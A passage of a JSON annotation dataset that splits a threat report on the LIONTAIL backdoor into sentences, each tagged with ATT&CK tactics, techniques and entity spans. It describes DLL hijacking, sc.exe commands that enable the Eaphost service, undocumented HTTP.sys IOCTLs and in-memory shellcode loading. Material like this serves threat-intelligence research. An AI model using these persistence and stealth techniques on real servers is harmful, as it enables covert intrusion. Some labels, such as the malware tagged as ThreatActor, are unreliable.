"Depending on the Windows Server version, the malicious DLL is then loaded either directly by other processes, such as Explorer.exe, or the threat actors enable specific services, disabled by default, that require those DLLs.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" }, { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1574", "name": "Hijack Execution Flow" }, { "id": "T1543", "name": "Create or Modify System Process" } ], "procedure": "Load a malicious DLL via legitimate processes or enable disabled services to ensure execution and persistence on the system.", "entities": [ { "text": "loaded either directly by other processes", "start": 67, "end": 108, "label": "Action" }, { "text": "malicious DLL", "start": 45, "end": 58, "label": "MalwareTool" }, { "text": "Explorer.exe", "start": 118, "end": 130, "label": "Infrastructure_Indicator" }, { "text": "enable specific services", "start": 153, "end": 177, "label": "Action" } ] }, { "uid": "aptnotes-04_aptnotes_report-p3-s30-f296d6", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 3, "sentence_id": 30, "context_before": "Depending on the Windows Server version...", "sentence_text": "In the case of wlbsctrl.dll, the DLL is loaded at the start of the IKE and AuthIP IPsec Keying Modules service.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" }, { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1574.001", "name": "Hijack Execution Flow: DLL Search Order Hijacking" } ], "procedure": "The malicious DLL is loaded during service startup.", "entities": [ { "text": "DLL is loaded", "start": 33, "end": 46, "label": "Action" }, { "text": "wlbsctrl.dll", "start": 15, "end": 27, "label": "MalwareTool" }, { "text": "IKE and AuthIP IPsec Keying Modules service", "start": 67, "end": 110, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-04_aptnotes_report-p3-s31-5243c0", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 3, "sentence_id": 31, "context_before": "In the case of wlbsctrl.dll, the DLL is loaded at the start of the IKE and AuthIP IPsec Keying Modules service.", "sentence_text": "For wlanapi.dll, the actors enable Extensible Authentication Protocol:\nsc.exe config Eaphost start=auto sc.exe start Eaphost In instances where LIONTAIL is deployed as an executable, a noteworthy characteristic observed in some is the attempt to disguise the executable as Cyvera Console, a component of Cortex XDR.\n3/31", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1036.005", "name": "Match Legitimate Resource Name or Location" } ], "procedure": "Actors enable and start the Eaphost service and disguise the executable as Cyvera Console.", "entities": [ { "text": "enable Extensible Authentication Protocol", "start": 28, "end": 69, "label": "Action" }, { "text": "sc.exe config Eaphost start=auto", "start": 71, "end": 103, "label": "Action" }, { "text": "sc.exe start Eaphost", "start": 104, "end": 124, "label": "Action" }, { "text": "disguise the executable as Cyvera Console", "start": 246, "end": 287, "label": "Action" } ] }, { "uid": "aptnotes-04_aptnotes_report-p4-s32-4289b5", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 4, "sentence_id": 32, "context_before": "For wlanapi.dll, the actors enable Extensible Authentication Protocol:\nsc.exe config Eaphost start=auto sc.exe start Eaphost In instances where LIONTAIL is deployed as an executable, a noteworthy characteristic observed in some is the attempt to disguise the executable as Cyvera Console, a component of Cortex XDR.\n3/31", "sentence_text": "Configuration\nThe malware starts by performing a one-byte XOR decryption of a structure containing the malware configuration, which is represented with the following structure:", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1027", "name": "Obfuscated Files or Information" } ], "procedure": "Perform XOR decryption of configuration data at execution start.", "entities": [ { "text": "starts by performing a one-byte XOR decryption", "start": 26, "end": 72, "label": "Action" } ] }, { "uid": "aptnotes-04_aptnotes_report-p4-s33-9844ea", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 4, "sentence_id": 33, "context_before": "Configuration\nThe malware starts by performing a one-byte XOR decryption of a structure containing the malware configuration, which is represented with the following structure:", "sentence_text": "QWORD var_0\nQWORD var_8\nQWORD magic_number\nDWORD num_of_end_string\nDWORD num_of_listen_urls\nSTRING end_string\nSTRING", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-04_aptnotes_report-p4-s34-612070", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 4, "sentence_id": 34, "context_before": "QWORD var_0\nQWORD var_8\nQWORD magic_number\nDWORD num_of_end_string\nDWORD num_of_listen_urls\nSTRING end_string\nSTRING", "sentence_text": "[] listen_urls\nThe field listen_urls defines particular URL prefixes to which the malware listens for incoming requests.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-04_aptnotes_report-p4-s35-526af6", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 4, "sentence_id": 35, "context_before": "[] listen_urls\nThe field listen_urls defines particular URL prefixes to which the malware listens for incoming requests.", "sentence_text": "All of the samples’ URL lists include the http://+:80/Temporary_Listen_Addresses/ URL prefix, a default WCF URL reservation that allows any user to receive messages from this URL.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-04_aptnotes_report-p4-s36-714176", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 4, "sentence_id": 36, "context_before": "All of the samples’ URL lists include the http://+:80/Temporary_Listen_Addresses/ URL prefix, a default WCF URL reservation that allows any user to receive messages from this URL.", "sentence_text": "Other samples include multiple URLs on ports 80, 443, and 444 (on Exchange servers)\nmimicking existing services, such as:\nMany LIONTAIL samples contain tailor-made configurations, which add multiple other custom URLs that match existing web folders on the compromised server.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-04_aptnotes_report-p4-s37-5fc21d", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 4, "sentence_id": 37, "context_before": "Other samples include multiple URLs on ports 80, 443, and 444 (on Exchange servers)\nmimicking existing services, such as:\nMany LIONTAIL samples contain tailor-made configurations, which add multiple other custom URLs that match existing web folders on the compromised server.", "sentence_text": "As the URLs for the existing folders are already taken by the actual IIS service, the generated payloads contain additional random dictionary words in the path.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-04_aptnotes_report-p4-s38-392670", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 4, "sentence_id": 38, "context_before": "As the URLs for the existing folders are already taken by the actual IIS service, the generated payloads contain additional random dictionary words in the path.", "sentence_text": "These ensure the malware communication blends into legitimate traffic, helping to make it more inconspicuous.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1036", "name": "Masquerading" } ], "procedure": "The malware blends its communication into legitimate traffic to evade detection.", "entities": [ { "text": "malware communication", "start": 17, "end": 38, "label": "MalwareTool" }, { "text": "ensure the malware communication blends into legitimate traffic", "start": 6, "end": 69, "label": "Action" } ] }, { "uid": "aptnotes-04_aptnotes_report-p4-s39-4164ec", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 4, "sentence_id": 39, "context_before": "These ensure the malware communication blends into legitimate traffic, helping to make it more inconspicuous.", "sentence_text": "The host element of all prefixes in the configuration consists of a single plus sign (+), a “strong wildcard” that matches all possible host names.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-04_aptnotes_report-p4-s40-675a50", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 4, "sentence_id": 40, "context_before": "The host element of all prefixes in the configuration consists of a single plus sign (+), a “strong wildcard” that matches all possible host names.", "sentence_text": "A strong wildcard is useful when an application needs to serve requests addressed to one or more relative URLs, regardless of how those requests arrive on the machine or what site (host or IP address)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-04_aptnotes_report-p4-s41-c835cd", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 4, "sentence_id": 41, "context_before": "A strong wildcard is useful when an application needs to serve requests addressed to one or more relative URLs, regardless of how those requests arrive on the machine or what site (host or IP address)", "sentence_text": "they specify in their Host headers.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-04_aptnotes_report-p4-s42-1e2cec", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 4, "sentence_id": 42, "context_before": "they specify in their Host headers.", "sentence_text": "To understand how the malware configures listeners on those prefixes and how the approach changes with time, we pause for a short introduction to the Windows HTTP stack.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-04_aptnotes_report-p4-s43-aab663", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 4, "sentence_id": 43, "context_before": "To understand how the malware configures listeners on those prefixes and how the approach changes with time, we pause for a short introduction to the Windows HTTP stack.", "sentence_text": "Windows HTTP Stack components 4/31", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-04_aptnotes_report-p5-s44-5d8389", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 5, "sentence_id": 44, "context_before": "Windows HTTP Stack components 4/31", "sentence_text": "This mechanism is encapsulated within HTTP.sys, a kernel-mode driver that assumes the responsibility of processing HTTP requests, listens to incoming HTTP requests, and directs them to the relevant user-mode processes or services for further handling.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-04_aptnotes_report-p5-s45-58395e", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 5, "sentence_id": 45, "context_before": "This mechanism is encapsulated within HTTP.sys, a kernel-mode driver that assumes the responsibility of processing HTTP requests, listens to incoming HTTP requests, and directs them to the relevant user-mode processes or services for further handling.", "sentence_text": "On top of the driver layer, Windows provides the HTTP Server API, a user-mode component that provides the interface for interacting with HTTP.sys.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-04_aptnotes_report-p5-s46-cdda8c", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 5, "sentence_id": 46, "context_before": "On top of the driver layer, Windows provides the HTTP Server API, a user-mode component that provides the interface for interacting with HTTP.sys.", "sentence_text": "In addition, the Internet Information Services (IIS) under the hood relies on HTTP API to interact with the HTTP.sys driver.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-04_aptnotes_report-p5-s47-a27e4f", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 5, "sentence_id": 47, "context_before": "In addition, the Internet Information Services (IIS) under the hood relies on HTTP API to interact with the HTTP.sys driver.", "sentence_text": "In a similar fashion, the HttpListener class within the .NET framework is a simple wrapper around the HTTP Server API.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-04_aptnotes_report-p5-s48-5b9f94", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 5, "sentence_id": 48, "context_before": "In a similar fashion, the HttpListener class within the .NET framework is a simple wrapper around the HTTP Server API.", "sentence_text": "The malware registers one or more URL prefixes with HTTP.sys by any of the means provided by the Windows operating system.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1546", "name": "Event Triggered Execution" } ], "procedure": "Register URL prefixes with HTTP.sys to establish controlled handling of HTTP requests and maintain persistence within the system.", "entities": [ { "text": "The malware", "start": 0, "end": 11, "label": "MalwareTool" }, { "text": "registers one or more URL prefixes", "start": 12, "end": 46, "label": "Action" }, { "text": "HTTP.sys", "start": 52, "end": 60, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-04_aptnotes_report-p5-s49-6c82f5", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 5, "sentence_id": 49, "context_before": "The malware registers one or more URL prefixes with HTTP.sys by any of the means provided by the Windows operating system.", "sentence_text": "When an HTTP request is received, HTTP.sys identifies the application associated with the request’s prefix and forwards the request to the malware if it’s responsible for that prefix.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071.001", "name": "Application Layer Protocol: Web Protocols" } ], "procedure": "The malware receives HTTP requests routed through HTTP.sys.", "entities": [ { "text": "request is received", "start": 13, "end": 32, "label": "Action" }, { "text": "forwards the request", "start": 111, "end": 131, "label": "Action" }, { "text": "HTTP.sys", "start": 34, "end": 42, "label": "Infrastructure_Indicator" }, { "text": "malware", "start": 139, "end": 146, "label": "MalwareTool" } ] }, { "uid": "aptnotes-04_aptnotes_report-p5-s50-241367", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 5, "sentence_id": 50, "context_before": "When an HTTP request is received, HTTP.sys identifies the application associated with the request’s prefix and forwards the request to the malware if it’s responsible for that prefix.", "sentence_text": "The malware’s request handler then receives the request intercepted by HTTP.sys and generates a response for it.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071.001", "name": "Application Layer Protocol: Web Protocols" } ], "procedure": "Receive HTTP requests via HTTP.sys and generate responses to communicate over web protocols.", "entities": [ { "text": "The malware’s request handler", "start": 0, "end": 29, "label": "MalwareTool" }, { "text": "receives the request", "start": 35, "end": 55, "label": "Action" }, { "text": "HTTP.sys", "start": 71, "end": 79, "label": "Infrastructure_Indicator" }, { "text": "generates a response", "start": 84, "end": 104, "label": "Action" } ] }, { "uid": "aptnotes-04_aptnotes_report-p5-s51-6a4276", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 5, "sentence_id": 51, "context_before": "The malware’s request handler then receives the request intercepted by HTTP.sys and generates a response for it.", "sentence_text": "C&C Communication\nAfter extracting the configuration, the malware uses the same one-byte XOR to decrypt a shellcode responsible for establishing the C&C communication channel by listening to the provided URL prefixes list.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071", "name": "Application Layer Protocol" } ], "procedure": "The malware decrypts shellcode and establishes a C&C communication channel by listening on URL prefixes.", "entities": [ { "text": "the malware", "start": 54, "end": 65, "label": "MalwareTool" }, { "text": "uses the same one-byte XOR to decrypt a shellcode", "start": 66, "end": 115, "label": "Action" }, { "text": "establishing the C&C communication channel", "start": 132, "end": 174, "label": "Action" }, { "text": "listening to the provided URL prefixes list", "start": 178, "end": 221, "label": "Action" } ] }, { "uid": "aptnotes-04_aptnotes_report-p5-s52-84557f", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 5, "sentence_id": 52, "context_before": "C&C Communication\nAfter extracting the configuration, the malware uses the same one-byte XOR to decrypt a shellcode responsible for establishing the C&C communication channel by listening to the provided URL prefixes list.", "sentence_text": "While the concept of passive backdoors on web-facing Windows servers is not new and was observed in the wild hijacking the same Windows DLL wblsctrl.dll as early as 2019 (by Chinese-linked Operation ShadowHammer), the 5/31", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-04_aptnotes_report-p6-s53-b8cbc7", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 6, "sentence_id": 53, "context_before": "While the concept of passive backdoors on web-facing Windows servers is not new and was observed in the wild hijacking the same Windows DLL wblsctrl.dll as early as 2019 (by Chinese-linked Operation ShadowHammer), the 5/31", "sentence_text": "LIONTAIL developers elevated their approach.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-04_aptnotes_report-p6-s54-82f658", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 6, "sentence_id": 54, "context_before": "LIONTAIL developers elevated their approach.", "sentence_text": "Instead of using the HTTP API, the malware uses IOCTLs to interact directly with the underlying HTTP.sys driver.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1106", "name": "Native API" } ], "procedure": "The malware uses IOCTLs to interact directly with the HTTP.sys driver.", "entities": [ { "text": "the malware", "start": 31, "end": 42, "label": "MalwareTool" }, { "text": "uses IOCTLs to interact directly with the underlying HTTP.sys driver", "start": 43, "end": 111, "label": "Action" } ] }, { "uid": "aptnotes-04_aptnotes_report-p6-s55-d1b493", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 6, "sentence_id": 55, "context_before": "Instead of using the HTTP API, the malware uses IOCTLs to interact directly with the underlying HTTP.sys driver.", "sentence_text": "This approach is stealthier as it doesn’t involve IIS or HTTP API, which are usually closely monitored by security solutions, but is not a straightforward task given that the IOCTLs for HTTP.sys are undocumented and require additional research efforts by the threat actors.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-04_aptnotes_report-p6-s56-233c2c", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 6, "sentence_id": 56, "context_before": "This approach is stealthier as it doesn’t involve IIS or HTTP API, which are usually closely monitored by security solutions, but is not a straightforward task given that the IOCTLs for HTTP.sys are undocumented and require additional research efforts by the threat actors.", "sentence_text": "First, the shellcode registers the URL prefixes with HTTP.sys using the following IOCTLs:\n0x128000 – UlCreateServerSessionIoctl – Creates an HTTP/2.0 session.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1546", "name": "Event Triggered Execution" } ], "procedure": "Register URL prefixes with HTTP.sys via IOCTL calls to establish persistent handling of HTTP requests.", "entities": [ { "text": "the shellcode", "start": 7, "end": 20, "label": "MalwareTool" }, { "text": "registers the URL prefixes", "start": 21, "end": 47, "label": "Action" }, { "text": "HTTP.sys", "start": 53, "end": 61, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-04_aptnotes_report-p6-s57-ab546c", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 6, "sentence_id": 57, "context_before": "First, the shellcode registers the URL prefixes with HTTP.sys using the following IOCTLs:\n0x128000 – UlCreateServerSessionIoctl – Creates an HTTP/2.0 session.", "sentence_text": "0x128010 – UlCreateUrlGroupIoctl – Creates a new UrlGroup.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-04_aptnotes_report-p6-s58-11bb8d", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 6, "sentence_id": 58, "context_before": "0x128010 – UlCreateUrlGroupIoctl – Creates a new UrlGroup.", "sentence_text": "UrlGroups are configuration containers for a set of URLs created under the server session and inherit its configuration settings.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-04_aptnotes_report-p6-s59-b47a74", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 6, "sentence_id": 59, "context_before": "UrlGroups are configuration containers for a set of URLs created under the server session and inherit its configuration settings.", "sentence_text": "0x12801d – UlSetUrlGroupIoctl – Associates the UrlGroup with the request queue by setting HttpServerBindingProperty.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-04_aptnotes_report-p6-s60-144a60", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 6, "sentence_id": 60, "context_before": "0x12801d – UlSetUrlGroupIoctl – Associates the UrlGroup with the request queue by setting HttpServerBindingProperty.", "sentence_text": "0x128020 – UlAddUrlToUrlGroupIoctl – Adds the array of listen_urls to the newly created UrlGroup.\n6/31", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-04_aptnotes_report-p7-s61-873919", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 7, "sentence_id": 61, "context_before": "0x128020 – UlAddUrlToUrlGroupIoctl – Adds the array of listen_urls to the newly created UrlGroup.\n6/31", "sentence_text": "After registering the URL prefixes, the backdoor initiates a loop responsible for handling the incoming requests.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071.001", "name": "Application Layer Protocol: Web Protocols" } ], "procedure": "Initiate a loop to continuously handle incoming HTTP requests and maintain communication with external entities.", "entities": [ { "text": "the backdoor", "start": 36, "end": 48, "label": "MalwareTool" }, { "text": "initiates a loop", "start": 49, "end": 65, "label": "Action" }, { "text": "handling the incoming requests", "start": 82, "end": 112, "label": "Action" } ] }, { "uid": "aptnotes-04_aptnotes_report-p7-s62-844205", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 7, "sentence_id": 62, "context_before": "After registering the URL prefixes, the backdoor initiates a loop responsible for handling the incoming requests.", "sentence_text": "The loop continues until it gets the request from a URL equal to the end_string provided in the backdoor’s configuration.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": null, "procedure": "The backdoor continuously processes incoming requests until a trigger condition is met.", "entities": [ { "text": "loop continues", "start": 4, "end": 18, "label": "Action" }, { "text": "gets the request", "start": 28, "end": 44, "label": "Action" }, { "text": "URL", "start": 52, "end": 55, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-04_aptnotes_report-p7-s63-560f9f", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 7, "sentence_id": 63, "context_before": "The loop continues until it gets the request from a URL equal to the end_string provided in the backdoor’s configuration.", "sentence_text": "The backdoor receives requests from HTTP.sys using 0x124036 – UlReceiveHttpRequestIoctl IOCTL.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071.001", "name": "Application Layer Protocol: Web Protocols" } ], "procedure": "Receive HTTP requests via HTTP.sys using IOCTL calls to maintain communication with external entities.", "entities": [ { "text": "The backdoor", "start": 0, "end": 12, "label": "MalwareTool" }, { "text": "receives requests", "start": 13, "end": 30, "label": "Action" }, { "text": "HTTP.sys", "start": 36, "end": 44, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-04_aptnotes_report-p7-s64-86b28d", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 7, "sentence_id": 64, "context_before": "The backdoor receives requests from HTTP.sys using 0x124036 – UlReceiveHttpRequestIoctl IOCTL.", "sentence_text": "Depending on the version of the compromised server, the body of the request is received using 0x12403B – UlReceiveEntityBodyIoctl or (if higher than 20348) 0x12403A – UlReceiveEntityBodyFastIo.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-04_aptnotes_report-p7-s65-cb2514", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 7, "sentence_id": 65, "context_before": "Depending on the version of the compromised server, the body of the request is received using 0x12403B – UlReceiveEntityBodyIoctl or (if higher than 20348) 0x12403A – UlReceiveEntityBodyFastIo.", "sentence_text": "It is then base64-decoded and decrypted by XORing the whole data with the first byte of the data.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1140", "name": "Deobfuscate/Decode Files or Information" } ], "procedure": "The malware decodes and decrypts data using base64 and XOR.", "entities": [ { "text": "base64-decoded", "start": 11, "end": 25, "label": "Action" }, { "text": "decrypted by XORing", "start": 30, "end": 49, "label": "Action" } ] }, { "uid": "aptnotes-04_aptnotes_report-p7-s66-e5c25b", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 7, "sentence_id": 66, "context_before": "It is then base64-decoded and decrypted by XORing the whole data with the first byte of the data.", "sentence_text": "This is a common method of encryption observed in multiple malware families, including but not limited to DEV-0861’s web-deployed Reverse proxy.\n7/31", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-04_aptnotes_report-p8-s67-7f1aac", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 8, "sentence_id": 67, "context_before": "This is a common method of encryption observed in multiple malware families, including but not limited to DEV-0861’s web-deployed Reverse proxy.\n7/31", "sentence_text": "The decrypted payload has the following structure:\nQWORD shellcode_size\n_BYTE", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-04_aptnotes_report-p8-s68-6bf828", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 8, "sentence_id": 68, "context_before": "The decrypted payload has the following structure:\nQWORD shellcode_size\n_BYTE", "sentence_text": "[] shellcode\nQWORD shellcode_output (should be 0 in the incoming msg)\nQWORD shellcode_output_size (should be 0 in the incoming msg)\nQWORD MAGIC_NUM (has to be 0x18)\n_BYTE", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-04_aptnotes_report-p8-s69-b379ea", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 8, "sentence_id": 69, "context_before": "[] shellcode\nQWORD shellcode_output (should be 0 in the incoming msg)\nQWORD shellcode_output_size (should be 0 in the incoming msg)\nQWORD MAGIC_NUM (has to be 0x18)\n_BYTE", "sentence_text": "[] argument\nThe malware creates a new thread and runs the shellcode in memory.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1055", "name": "Process Injection" } ], "procedure": "The malware creates a new thread and runs the shellcode in memory.", "entities": [ { "text": "The malware", "start": 12, "end": 23, "label": "ThreatActor" }, { "text": "creates a new thread", "start": 24, "end": 44, "label": "Action" }, { "text": "runs the shellcode in memory", "start": 49, "end": 77, "label": "Action" } ] }, { "uid": "aptnotes-04_aptnotes_report-p8-s70-553901", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 8, "sentence_id": 70, "context_before": "[] argument\nThe malware creates a new thread and runs the shellcode in memory.", "sentence_text": "For some reason, it uses shellcode_output and shellcode_output_size in the request message as pointers to the respective data in memory.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1055", "name": "Process Injection" } ], "procedure": "The malware uses memory pointers to execute shellcode.", "entities": [ { "text": "uses shellcode_output", "start": 20, "end": 41, "label": "Action" }, { "text": "shellcode_output_size", "start": 46, "end": 67, "label": "Infrastructure_Indicator" }, { "text": "data in memory", "start": 121, "end": 135, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-04_aptnotes_report-p8-s71-366592", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 8, "sentence_id": 71, "context_before": "For some reason, it uses shellcode_output and shellcode_output_size in the request message as pointers to the respective data in memory.", "sentence_text": "LIONTAIL web shell In addition to PE implant, Scarred Manticore uses a web shell-based version of the LIONTAIL shellcode loader.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-04_aptnotes_report-p8-s72-fc5fb1", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 8, "sentence_id": 72, "context_before": "LIONTAIL web shell In addition to PE implant, Scarred Manticore uses a web shell-based version of the LIONTAIL shellcode loader.", "sentence_text": "The web shell is obfuscated in a similar manner to other Scarred Manticore .NET payloads and web shells.\n8/31", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-04_aptnotes_report-p9-s73-180c95", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 9, "sentence_id": 73, "context_before": "The web shell is obfuscated in a similar manner to other Scarred Manticore .NET payloads and web shells.", "sentence_text": "The web shell gets requests with 2 parameters:\nThe shellcode to execute.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" }, { "id": "TA0002", "name": "Execution" } ], "techniques": null, "procedure": "The web shell receives requests containing shellcode to execute.", "entities": [ { "text": "gets requests", "start": 14, "end": 27, "label": "Action" }, { "text": "shellcode to execute", "start": 51, "end": 71, "label": "Action" }, { "text": "web shell", "start": 4, "end": 13, "label": "MalwareTool" } ] }, { "uid": "aptnotes-04_aptnotes_report-p9-s74-f7774b", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 9, "sentence_id": 74, "context_before": "The web shell gets requests with 2 parameters:\nThe shellcode to execute.", "sentence_text": "The argument for the shellcode to use.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-04_aptnotes_report-p9-s75-9942e9", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 9, "sentence_id": 75, "context_before": "The argument for the shellcode to use.", "sentence_text": "Both parameters are encrypted the same way as other communication: XOR with the first byte followed by base64 encoding.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-04_aptnotes_report-p9-s76-58e803", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 9, "sentence_id": 76, "context_before": "Both parameters are encrypted the same way as other communication: XOR with the first byte followed by base64 encoding.", "sentence_text": "The structure of shellcodes and of arguments sent to the web shell-based shellcode loader is identical to those used in the LIONTAIL backdoor, which suggests that the artifacts observed are part of a bigger framework that allows the dynamic building of loaders and payloads depending on the actor’s access and needs.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-04_aptnotes_report-p9-s77-81203e", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 9, "sentence_id": 77, "context_before": "The structure of shellcodes and of arguments sent to the web shell-based shellcode loader is identical to those used in the LIONTAIL backdoor, which suggests that the artifacts observed are part of a bigger framework that allows the dynamic building of loaders and payloads depending on the actor’s access and needs.", "sentence_text": "LIONTAIL version using named pipes During our research, we also found loaders that have a similar internal structure to the LIONTAIL samples.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-04_aptnotes_report-p9-s78-8de7e4", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 9, "sentence_id": 78, "context_before": "LIONTAIL version using named pipes During our research, we also found loaders that have a similar internal structure to the LIONTAIL samples.", "sentence_text": "Instead of listening on URL prefixes, this version gets its payloads from a named pipe and likely is designated to be installed on internal servers with no access to the public web.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1041", "name": "Exfiltration Over C2 Channel" } ], "procedure": "The malware retrieves payloads through a named pipe channel.", "entities": [ { "text": "gets its payloads", "start": 